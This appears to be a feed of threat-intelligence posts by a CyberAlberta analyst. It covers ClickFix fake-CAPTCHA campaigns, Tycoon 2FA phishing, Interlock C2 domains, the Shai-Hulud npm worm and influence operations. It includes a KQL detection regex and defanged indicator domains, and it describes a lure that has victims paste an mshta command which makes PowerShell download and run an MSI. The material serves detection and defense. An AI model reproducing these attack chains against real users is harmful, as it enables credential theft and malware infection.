π
01.12.2025 16:02
π 0
π 0
π¬ 0
π 0
π
Recently discovered a webinar hosting platform actively scraping and redistributing public and private Zoom webinars without knowledge or consent of organizers.
Full details, recommendations, and detection opportunities here: cyberalberta.ca/zooming-out-...
#CTI #ThreatIntelligence #InfoSec
CyberAlberta's meta-analysis of the Shai-Hulud worm malware, and how it propagated throughout the npm ecosystem, pieces together the attack chain, detection opportunities, and guidance for maintainers and dependents of OSS packages.
cyberalberta.ca/the-scatteri...
#CTI #ThreatIntelligence #InfoSec
As Alberta moves to an uncertain future, with the possibility of a separatist vote looking ever more likely, the province could be a theatre to watch for researchers of influence operations.
CyberAlbertaβs latest strategic report covers the threat of #ElectionInterference, providing new findings of inauthentic accounts and news sites exploiting issues relevant to Alberta to antagonise the federal government.
cyberalberta.ca/system/files...
#CTI #ThreatIntelligence #InfoSec
CyberAlberta recently observed an attempted Vendor Email Compromise (VEC).
This highly convincing attack has been observed by the Irish Government, and researchers at Abnormal AI, who note high user engagement with this tactic.
cyberalberta.ca/the-evolving...
#CTI #ThreatIntel #InfoSec
The .es domains hosting the credential harvesting pages have a predictable regex pattern.
I've had success detecting hits with the following KQL. Only minor false positives that stick out quite easily so far.
DeviceNetworkEvents
| where RemoteUrl matches regex @"^[a-z0-9]{4,6}\.[a-z]{7,8}\.es$"
Senders:
- no-reply@campbell[.]edu
- no-reply@utah[.]edu
Subject: VN MSG[Timestamp] DURATION [MD5 HASH]
Attached HTML: Play_REC-Now[Username]Audio[MD5 HASH].html
π£ Latest observed Tycoon 2FA campaign
At least 2 US based education organizations are spoofed to send HTML files masquerading as voicemail or invoices, directing targets to a pre-filled credential harvesting page hosted on DGA .es domains.
#ThreatIntelligence #CTI #InfoSec
Opening the search up to span April and May reveals that "Brenda Esparon" has been busy creating domains which:
- Use commonly abused root domains
- Often appear to be a DGA
- Impersonate financial sector organisations and other legitimate services
#ThreatIntelligence #CTI #InfoSec
Domains all created within the same day
doriot[.]info
asperod[.]tech
bkoegjtrihodetngpejfqsg[.]shop
cmbngotrndotnettktopvedeiob[.]shop
lolpendrev[.]info
maxcard[.]guru
Not enough to attribute these to Interlock, however, doriot[.]info has been detected on ThreatFox as FAKEUPDATES
Interlock hard-coded C2 domains
playiro[.]net
basiclock[.]cc
cluders[.]org
Show the following characteristics
Registrar: PDR
Registrant Name: "Brenda Esparon", or "REDACTED", or "None"
Created around: 1330 27/04/25
Pivoting on these data points in @silentpush.bsky.social reveals more π
Great work as always.
Manipulating VIGINUMβs content to undermine the French government is both shocking and entirely predictable at the same time.
Impersonating Microsoft applications and using Njalla for DNS? Smells like more RomCom. Nice find.
A recent spear phishing campaign leveraged Google Workspace to provide DKIM authentication to a maliciously crafted subdomain. This technique, combined with a misconfigured DMARC policy on the root domain increased delivery rates.
#ThreatIntelligence #CTI #InfoSec
cyberalberta.ca/spear-phishi...
Bots are already at the ballot box π³οΈ π€
Ahead of the #2025CanadaElection, the DFRLab uncovered bot-like accounts on X spamming political contentβmainly targeting the Liberal Party with recycled, false claims & signs of AI-driven amplification.
π bit.ly/3YgjSD9
Pure revisionism. Krebs, and the rest of the team at CISA, worked to uphold the integrity of the 2020 US election. Not whatever on earth this βfact sheetβ is claiming.
CyberAlbertaβs latest report analyzes recent #ClickFix infrastructure observed in the wild, and the subsequent attack chain, offerinf examples of what to look out for, and how to mitigate the impacts.
#ThreatIntelligence #CTI #InfoSec
cyberalberta.ca/human-verifi...
LotL isnβt going anywhere. Our latest report highlights how these techniques were recently used to facilitate a recent ransomware deployment, including guidance on detecting and mitigating these all-too-common techniques
cyberalberta.ca/ransomware-t...
#ThreatIntelligence #CTI #InfoSec #Ransomware
7/7 Alternatively, the following search in URLScan for all pages containing a redirect to caprofklfkzttripwith[.]com provides higher confidence domain results but will almost certainly be missing some.
urlscan.io/search/#doma...
Having said that, detecting mshta http is always a good idea anywayπ€·
6/7 This will likely result in false positive domains, but confirming the ones that have been compromised seems to require looking for a clue in the HTML fields that corresponds to one of the domains listed.
I admit I may not know a better method.
5/7 The following Censys query can be used to find the IPs hosting domains that have been compromised by malicious code redirecting to the fake Cloudflare Turnstile JavaScript.
search.censys.io/search/repor...
4/7 A previous investigation shows the third-stage domain redirects to kdfmmikfkafjikmfikfjhm[.]com. And the MSI results in the deployment of #SectopRAT
www.inde.nz/blog/i-am-no...
Pivoting on this redirect revealed another downlfkzfoqkajada[.]com
3/7 The second-stage domain serviceauthfoap[.]com hosts an audio player, and launches invoke web request commands via PowerShell to the third-stage domain (ownlifeforyouwithme[.]com) to save and execute an MSI.
Pivoting on HTML elements revealed another second-stage domain serviceindustrverif[.]com
2/7 So far, all observed fake Cloudflare Turnstiles prompt the visitor (after two failed attempts at verification) to copy and paste the same hidden mshta http command into Run, establishing a connection to the second-stage domain.
1/7 Tracking a #ClickFix cluster mass compromising WordPress sites, injecting code which redirects from a first-stage domain to JavaScript producing fake Cloudflare Turnstiles hosted on caprofklfkzttripwith[.]com
Turns out, information manipulation is a real problem for Canada too.
Explore @dfrlab.bsky.social's review of Canadaβs 2025 Public Inquiry into Foreign Interference as we assess the potential impact of foreign interference on Canada's elections π¨π¦
π dfrlab.org/2025/03/19/c...
#CanadaElections2025
Fake Captcha / #ClickFix campaigns are switching up themes.
We're seeing campaigns beginning to impersonate #GoogleMeet, in addition to the usual fake #Zoom and Booking pages.
Stay safe, and don't paste code from any suspicious sites.
The Pravda network flooded the internet with 3.6 million pieces of pro-Kremlin propaganda in 2024 alone. This disinformation has already found its way into Artificial Intelligence, allowing dangerous lies to spread even faster. www.axios.com/2025/03/06/e...
βPro-Kremlin Disinformation Ecosystem Targets Worldwide Audienceβ follows on from great research by @viginum.bsky.social & @dfrlab.bsky.social, analysing the latest iteration of Pravdaβs operation undermining the integrity of public opinion with disinformation.
cyberalberta.ca/pro-kremlin-...